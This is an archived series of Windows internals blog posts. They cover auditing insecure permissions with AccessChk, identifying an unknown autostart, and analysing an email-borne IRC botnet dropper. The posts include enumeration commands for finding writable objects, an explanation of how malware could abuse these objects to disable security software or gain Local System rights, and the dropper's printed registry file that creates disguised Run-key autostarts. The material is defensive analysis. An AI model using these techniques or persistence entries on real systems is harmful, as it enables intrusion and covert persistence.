</FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt 0.5in"> <FONT size="3"> <FONT face="Calibri"> File system: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -wsu </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> “ </FONT> </SPAN> <SPAN style="FONT-FAMILY: Courier"> %programfiles% </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> ” </FONT> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin"> <BR /> </SPAN> <FONT size="3"> <FONT face="Calibri"> File system: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -wsu </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> “ </FONT> </SPAN> <SPAN style="FONT-FAMILY: Courier"> %systemroot% </SPAN> <SPAN style="mso-ascii-font-family: Courier"> <FONT face="Calibri"> ” </FONT> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin"> <BR /> </SPAN> <FONT face="Calibri"> <FONT size="3"> Registry: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> </FONT> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -kwsu hklm <BR /> </SPAN> <FONT face="Calibri"> Processes: <SPAN style="mso-tab-count: 1"> </SPAN> <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> </FONT> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -pwu * <BR /> </SPAN> <FONT face="Calibri"> Named Objects: <SPAN style="mso-tab-count: 1"> </SPAN> </FONT> </FONT> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -owu basenamedobjects <BR /> </SPAN> <FONT face="Calibri"> Services: <SPAN style="mso-tab-count: 2"> </SPAN> </FONT> <SPAN style="FONT-FAMILY: Courier"> accesschk everyone -cwu 
* </SPAN></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I ran similar commands looking for write access from the Authenticated Users and Users groups. An output line, which looks like “RW C:\Program Files\Vendor”, reveals a probable security flaw. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To my surprise and dismay, I found security holes in several namespaces. The security settings on one application’s global synchronization and memory mapping objects, as well as on its installation directory, allow unprivileged users to effectively shut off the application, corrupt its configuration files, and replace its executables to elevate to Local System privileges. What application has such grossly insecure permissions? Ironically, that of a top-tier security vendor. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For instance, AccessChk showed output that indicated the Users group has write access to the application’s configuration directory (note that names have been changed): </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> RW C:\Program Files\SecurityVendor\Config <BR /> RW C:\Program Files\SecurityVendor\Config\scanmaster.db <BR /> RW C:\Program Files\SecurityVendor\Config\realtimemaster.db <BR /> </SPAN> <FONT face="Calibri"> <SPAN style="mso-ascii-font-family: Courier"> … </SPAN> <SPAN style="FONT-FAMILY: Courier"> </SPAN></FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Because malware would run in the Users group, it could modify the configuration data or create its own version and prevent the security software from changing it. It could also watch for dynamic updates to the files and reset their contents. 
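</FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When a scan returns hundreds of lines it helps to filter them programmatically. The following is only a minimal sketch, assuming the output has the shape of the sample lines above: an access column made of R and/or W, an optional bracketed object type such as AccessChk prints for named objects, and then the object name. The names Entry, parse_line and writable are hypothetical helpers, the third sample line is invented for illustration, and real AccessChk output may contain other line shapes that this pattern simply skips. </FONT> </P>

```python
import re
from typing import NamedTuple, Optional


class Entry(NamedTuple):
    access: str          # "R", "W" or "RW", as printed in the first column
    kind: Optional[str]  # bracketed object type such as "Section"; None for files and keys
    name: str            # path or object name


# Assumed line shape: access flags, optional "[Type]", then the name.
_LINE = re.compile(
    r"^\s*(?P<access>[RW]{1,2})\s+(?:\[(?P<kind>[^\]]+)\]\s+)?(?P<name>\S.*?)\s*$"
)


def parse_line(line):
    """Return an Entry for a line in the assumed shape, or None for anything else."""
    match = _LINE.match(line)
    if match is None:
        return None
    return Entry(match.group("access"), match.group("kind"), match.group("name"))


def writable(lines):
    """Keep only the entries whose access column includes W."""
    entries = (parse_line(line) for line in lines)
    return [entry for entry in entries if entry is not None and "W" in entry.access]


# Sample input modeled on the (renamed) lines above; the read-only line is hypothetical.
sample = [
    r"RW C:\Program Files\SecurityVendor\Config",
    r"RW C:\Program Files\SecurityVendor\Config\scanmaster.db",
    r"R  C:\Program Files\SecurityVendor\readme.txt",
    "",
]

for entry in writable(sample):
    print(entry.access, entry.name)
```

<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Keeping the parser tolerant of lines it doesn’t recognize means banner text and blank lines in saved output are ignored rather than reported as findings. 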
</FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For the object namespace, it reported output lines like this: </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <SPAN style="FONT-FAMILY: Courier"> RW [Section] <SPAN style="mso-spacerun: yes"> </SPAN> \basenamedobjects\12345678-abcd-1234-cdef-123456789abc <BR /> RW [Mutant] <SPAN style="mso-spacerun: yes"> </SPAN> \basenamedobjects\87654321-cdab-3124-efcd-6789abc12345 <BR /> </SPAN> <FONT face="Calibri"> <SPAN style="mso-ascii-font-family: Courier"> … </SPAN> <SPAN style="FONT-FAMILY: Courier"> </SPAN></FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I executed handle searches in <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> to determine which processes had these objects open and it reported those of the security software. Sections represent shared memory so it was likely that the security agent,&nbsp;running in user login sessions, was using it to communicate data to the security software’s service process that was running in the Local System account. Malware could therefore modify the contents of the memory, possibly triggering a bug in the service that might allow the malware to obtain administrative rights. At the minimum it could manipulate the data to foil the communication. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> “Mutant” is the internal name for Windows mutexes, and the security software’s service was using the mutex for synchronization. That means that malware could acquire the mutex and block forward progress by the service. There were more than a few of these objects with wide-open security that could potentially be used to compromise or disable the security software. 
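</FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The blocking risk is easy to picture with a small analogy. The sketch below is not the Win32 API and not the vendor’s code: it uses Python’s threading.Lock as a stand-in for a named mutex that any user may open, and the function names hostile_holder, service_step and demo are hypothetical. One thread takes the lock and sits on it, and the "service" fails to make progress until the lock is let go. </FONT> </P>

```python
import threading

# Stand-in for a named mutex whose permissions let any user acquire it.
shared_lock = threading.Lock()


def hostile_holder(acquired, release):
    """Take the shared lock and hold it until told to let go."""
    with shared_lock:
        acquired.set()   # signal that the lock is now held
        release.wait()   # keep holding it; the service cannot proceed meanwhile


def service_step(timeout):
    """One unit of service work that needs the lock; True if it could run."""
    if not shared_lock.acquire(timeout=timeout):
        return False     # gave up waiting: forward progress is blocked
    try:
        return True      # the real work would happen here
    finally:
        shared_lock.release()


def demo():
    acquired, release = threading.Event(), threading.Event()
    holder = threading.Thread(target=hostile_holder, args=(acquired, release))
    holder.start()
    acquired.wait()                      # make sure the holder owns the lock first
    blocked = service_step(timeout=0.2)  # attempted while the lock is held
    release.set()
    holder.join()
    recovered = service_step(timeout=0.2)  # attempted after the lock is released
    return blocked, recovered


if __name__ == "__main__":
    print(demo())
```

<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A timeout, as used here, lets the waiting side notice the stall, but the sturdier fix is the one this post argues for: permissions on the object that keep unprivileged code from acquiring it in the first place. 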
</FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In the wake of my discovery, I analyzed the rest of my systems, as well as trial versions of other popular security, game, ISP and consumer applications. A number of the most popular in each category had problems similar to those of the security software installed on my development system. I felt like I was shining a flashlight under a house and finding rotten beams where I had assumed there was a sturdy foundation. The security research community has focused its efforts on uncovering local elevations via buffer overflows and unverified parameters, but has completely overlooked these obvious problems – problems often caused by the software of security ISVs, or in some cases, their own. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Why are these holes created? I can only speculate, but because allowing unprivileged groups write-access to global objects requires explicit override of secure defaults, my guess is that they are common in software that was originally written for Windows 9x or assumed a single administrative user. When faced with permissions issues that crop up when migrating to a version of Windows with security, or that occur when their software is run by standard user accounts, the software developers have taken the easy way out and essentially turned off security. </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Regardless of the reason, it’s time for software vendors – especially those of security applications – to secure their software. If you discover insecure software on your system, please file a bug with the publisher, and if you are a software developer, please follow the guidance in “ <A class="" href="#" mce_href="#" target="_blank"> Writing Secure Code </A> ,” by Michael Howard and David LeBlanc. 
</FONT> </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:32:42 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-insecure-security-software/ba-p/723569 MarkRussinovich 2019-06-27T06:32:42Z The Case of the Unknown Autostart https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unknown-autostart/ba-p/723568 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 21, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A few weeks ago I installed an update to a popular Internet Explorer media-player ActiveX control on one of my systems. I knew from past experience that the plugin’s updates always configure an autostart (an executable configured to automatically launch during boot, login or with another process) that I don’t believe serves any useful purpose, so as I had in the past, I launched Sysinternals <A class="" href="#" mce_href="#" target="_blank"> Autoruns </A> , set both Verify Code Signatures and Hide Signed Microsoft Entries in the options menu, pressed Refresh, found the autostart and deleted it. 
However, as I was about to close the window another entry caught my eye and caused my heart to stop: </FONT> </P> <BR /> <P class="MsoNormal" mce_keep="true" style="MARGIN: 0in 0in 10pt"> <IMG height="307" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010598/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010598/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120968i56D0617737126E46" style="WIDTH: 591px; HEIGHT: 307px" width="591" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The entry, IECheck, has all the characteristics of malware: it has no icon, description, or company name, and it’s located in the Windows directory. Further, Autoruns’ Search Online feature, which executes a Web search, yielded no information on the suspicious executable. 
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I needed to investigate further to determine if the entry was a sign of a malware infection, so I turned to the Sysinternals <A class="" href="#" mce_href="#" target="_blank"> Strings </A> utility. Image files often contain plain-text strings with clues that can connect the file to an application. For example, if a program reads configuration information from the registry, the registry path is embedded in the executable and usually includes the name of the vendor or application. Strings scans a file for printable strings (both Unicode and ASCII) and prints them, so my next step was to open a command prompt and dump those in IECheck.exe. Sometimes the output is so verbose that it’s easier to pipe the output to a text file and study the results with Notepad, but this time I spotted some interesting text as it scrolled past: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="277" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010603/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1010603/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120969iD7D023332E3AA99C" style="WIDTH: 394px; HEIGHT: 277px" width="394" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Sure enough, the executable had string references to other executables that are probably part of the same application, and they revealed the name of the application, IconEdit2, as well as the vendor, <A class="" href="#" mce_href="#" target="_blank"> WinAppsPlanet </A> . 
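</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For readers curious about what such a scan involves, here is a rough sketch of the idea, not the Strings implementation. It assumes "printable" means the ASCII range 0x20 to 0x7E, treats Unicode as UTF-16LE text limited to those same characters, and uses a minimum length of four; the function name printable_strings, the threshold, and the sample path and registry-style string are all hypothetical. </FONT> </P>

```python
import re


def printable_strings(data, min_len=4):
    """Return runs of printable characters found in a bytes object.

    ASCII runs are reported first, then UTF-16LE runs (a printable ASCII
    byte followed by a zero byte), each at least min_len characters long.
    """
    found = []

    # Single-byte text: consecutive bytes in the printable ASCII range.
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in ascii_run.finditer(data):
        found.append(match.group().decode("ascii"))

    # Wide text: the same characters, each stored as two bytes (char, 0x00).
    wide_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for match in wide_run.finditer(data):
        found.append(match.group().decode("utf-16-le"))

    return found


# Hypothetical stand-in for an executable's bytes: binary noise around one
# single-byte path and one wide registry-style string.
sample = (
    b"\x00\x01"
    + b"C:\\Program Files\\ExampleApp\\example.exe"
    + b"\xff\x00"
    + "Software\\ExampleVendor".encode("utf-16-le")
    + b"\x00\x00\x02"
)

for text in printable_strings(sample):
    print(text)
```

<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To try it on a real file, pass the result of open(path, "rb").read() instead of the sample bytes. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3">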
<SPAN style="mso-spacerun: yes"> </SPAN> I then remembered that I had just downloaded IconEdit a few days earlier to edit high-resolution Vista-style icons and so I was able to classify the incident as a false alarm and close the case. My heart returned to its normal rhythm. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> This example highlights a few practices that software vendors should follow for reliability and to prevent the confusion I faced. <SPAN style="mso-spacerun: yes"> </SPAN> First is the use of environment variables and Shell special paths instead of hard-coded strings. IECheck (which I presume stands for Icon Editor Check) references the Program Files directory by name, which is only valid on English installations of Windows, so if installed on a non-English system, IECheck would fail to find the executables it looks for. Instead, it should locate the Program Files directory by using the %PROGRAMFILES% environment variable, or call SHGetFolderPath with <SPAN style="FONT-SIZE: 11pt; FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"> CSIDL_PROGRAM_FILES </SPAN> for the folder parameter. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To avoid scaring security-conscious users, all executables should have a version resource with a company name and a description that clearly identifies the executable’s purpose. Further, vendors should obtain a code signing certificate to digitally sign their code. 
<SPAN style="mso-spacerun: yes"> </SPAN> Windows relies more and more on signature information to help users make trust decisions, and users can leverage tools like <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> , Autoruns, and <A class="" href="#" mce_href="#" target="_blank"> Sigcheck </A> to verify that executables are what they advertise instead of malware. I’ve contacted the author of IconEdit2 and he’ll be updating his application to follow this guidance. All vendors need to do their part to avoid this kind of needless scare. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:32:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unknown-autostart/ba-p/723568 MarkRussinovich 2019-06-27T06:32:37Z WinHEC, TechEd and MSDRT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/winhec-teched-and-msdrt/ba-p/723565 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 10, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> I love speaking at conferences. They provide great opportunities to share information, meet interesting people, hear the concerns and desires of people out in the real world, and see things from a different perspective. I’ve actually been remiss posting all my public appearances on Sysinternals. Some of my recent appearances included Microsoft’s TechReady conference in February, <A class="" href="#" mce_href="#" target="_blank"> CanSecWest </A> in Vancouver a few weeks ago and <A class="" href="#" mce_href="#" target="_blank"> EUSecWest </A> in London on March 2. </FONT> </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> My next appearance will be my first keynote at a Microsoft conference, which is very exciting for me. 
It’s at the <A class="" href="#" mce_href="#" target="_blank"> Microsoft Windows Hardware Engineering Conference </A> (WinHEC)&nbsp;on May 15 and 16 in Los Angeles. Mine is one of <A class="" href="#" mce_href="#" target="_blank"> several keynotes </A> that include&nbsp;Bill Gates and Craig Mundie presenting on the first day and me on the second day. </FONT> </FONT> <FONT size="3"> <FONT face="Calibri"> My talk, <I style="mso-bidi-font-style: normal"> Windows Server Platform Internals </I> , is more technical than your average keynote and is a bit of an experiment for the conference. The session will be a lot of fun with a bunch of demos, but because I only have an hour it will also be challenging because I have over three hours of material from which I have to pull highlights to fit. </FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> I’m also speaking again at <A class="" href="#" mce_href="#" target="_blank"> TechEd US </A> in Orlando. The conference is the week of June 4, but my <A class="" href="#" mce_href="#" target="_blank"> four sessions </A> are all on the last two days. </FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> Finally, if you happened to miss it, check out my first <A class="" href="#" mce_href="#" target="_blank"> Channel 9 interview </A> , where I talk about life at Microsoft, how Sysinternals got started, Windows Vista and UAC. 
</FONT></FONT></P><P> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> Speaking of how Sysinternals&nbsp;got started, the Winternals Administrator’s Pak, with ERD Commander at the core, has debuted in its Microsoft form as the Microsoft Diagnostics and Repair Toolkit (unfortunately, my technical position gives me no influence over product names). The toolkit is included in the Microsoft Desktop Optimization Pack (MDOP), which is available for purchase through Microsoft’s Software Assurance program, and you can download the <A class="" href="#" mce_href="#" target="_blank"> 30-day trial version </A> from the Microsoft download center. </FONT> </FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt; mso-margin-bottom-alt: auto"> <FONT size="3"> <FONT face="Calibri"> I hope to see you at one of my sessions! </FONT></FONT></P><P> </P> <P></P> <P mce_keep="true"> </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:32:20 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/winhec-teched-and-msdrt/ba-p/723565 MarkRussinovich 2019-06-27T06:32:20Z Botnets by Email https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/botnets-by-email/ba-p/723559 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 09, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I make no effort to hide my email address, which means that I know the instant a new email-based virus, phishing attack, or penny-stock-pumping scam launches when my inbox floods. Most such emails are easy to distinguish from legitimate emails because of their lack of personalization, poor grammar, or low-quality images that attempt to foil spam filters. On occasion, however, I get a message that causes me to examine it a little more closely in order to make sure it’s junk. I also look out for ones that might trick unsophisticated users. 
</FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> My family uses <A class="" href="#" mce_href="#" target="_blank"> BlueMountain greetings </A> </FONT> <FONT size="3"> <FONT face="Calibri"> to send eCards, so when I received this email I took a second look: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="452" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741364/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741364/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120962i9CEE266D67A81402" style="WIDTH: 500px; HEIGHT: 452px" width="500" /> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> There are a couple of immediate clues that the email is a fake. 
For example, the body doesn’t address me by name and there’s a space between “friend” and the exclamation point. Hovering the mouse over the link shows that it masks an address at a different site, but the presence of BlueMountains and the legitimate-looking KoKoCards in the name might be sufficient to fool a casual scan. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Curious to see what kind of con the email was perpetrating, I fired up a virtual machine that was isolated from the local network and clicked on the link. Instead of being taken to a web site like I expected, an Internet Explorer dialog appeared and asked me if I wanted to save or run “Postcard.jpg.exe.” Most users that might have followed the ruse this far would probably be suspicious and not run it, but out of curiosity I started Process Monitor to watch the action and ran it. What I found isn’t very sophisticated, but it’s interesting because it’s an email virus that’s making the rounds today. 
</FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> First I saw the flash of a command prompt window starting and exiting, and then a prompt from the firewall appeared: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="250" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741365/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741365/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120963iF74CFD35508E90DC" style="WIDTH: 348px; HEIGHT: 250px" width="348" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I immediately recognized that the program requesting access through the firewall is a popular Internet Relay Chat (IRC) client. I unblocked it, waited a couple of minutes, and then turned my attention to Process Monitor to see what had transpired. I opened the process tree tool from the Tools menu, which shows all the processes that generated activity in a tracing session, including ones that have exited. 
I saw evidence of the initial installer, the command prompt that I had seen, and a Regedit child process of the command prompt, all of which have faded icons to show that they had exited by the end of the collected trace: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="387" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741367/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741367/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120964i490A9A7CA567240E" style="WIDTH: 423px; HEIGHT: 387px" width="423" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> The command prompt’s command line, visible in the process tree, indicates that it was launched to execute a batch file, sup.bat. Sup.bat was left in the System32 directory, so I could see from its contents that it passes Regedit a registry file named sup.reg, which creates two auto-start entries: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> REGEDIT4 <BR /> [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] <BR /> "taskmgr"="C:\\WINNT\\system32\\explorer.exe" <BR /> "IExplorer"="C:\\WINDOWS\\system32\\explorer.exe" </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The seemingly redundant entries simply ensure that mIRC will autostart when the system boots regardless of whether the system directory is Winnt or Windows. 
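<BR /> To make the effect of sup.reg concrete, here is a minimal Python sketch that pulls the auto-start values out of REGEDIT4-style text. The helper name parse_run_entries and the constants are my own illustrative assumptions, not part of Regedit or any Sysinternals tool, and the parser only handles simple string values like the two shown above.

```python
# Minimal sketch: list the auto-start values defined in REGEDIT4-style text.
# parse_run_entries, RUN_KEY and SUP_REG are hypothetical names for illustration.
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

# The registry file contents quoted in the post.
SUP_REG = r'''REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"taskmgr"="C:\\WINNT\\system32\\explorer.exe"
"IExplorer"="C:\\WINDOWS\\system32\\explorer.exe"
'''


def parse_run_entries(reg_text):
    """Return {value name: command line} for values under the Run key."""
    entries = {}
    current_key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            # A bracketed line starts a new registry key section.
            current_key = line[1:-1]
        elif (current_key is not None
              and current_key.lower() == RUN_KEY.lower()
              and line.startswith('"') and "=" in line):
            name, _, value = line.partition("=")
            # .reg files escape each backslash as a double backslash.
            entries[name.strip('"')] = value.strip('"').replace("\\\\", "\\")
    return entries


if __name__ == "__main__":
    for name, command in parse_run_entries(SUP_REG).items():
        print(name, "->", command)
```

Both values point at an explorer.exe under System32, one for each possible system directory name, which matches the redundancy described above.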
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> The process tree showed only one additional process still running, mIRC, which was using Explorer as its cover name to blend into the list of legitimate programs a user would see in Task Manager. Process Monitor of course reveals “explorer’s” true identity by showing the mIRC icon, description and company name: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="387" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741368/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741368/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120965iB98DAC0C956FBDD2" style="WIDTH: 423px; HEIGHT: 387px" width="423" /> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> The mIRC I had on my system was unmodified from the one on the mIRC homepage. My guess is that the malware author didn’t alter the description or company name because they don’t show up in versions of Task Manager prior to the one in Windows Vista, and antivirus is left in the difficult position of flagging a legitimate program as malware. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Having completed my examination of the process tree, I returned to Process Monitor’s tracing window and scanned through the output. I set a Category filter to include operations in the Write category, which narrowed the output to modifications made during the installation and first run of mIRC. 
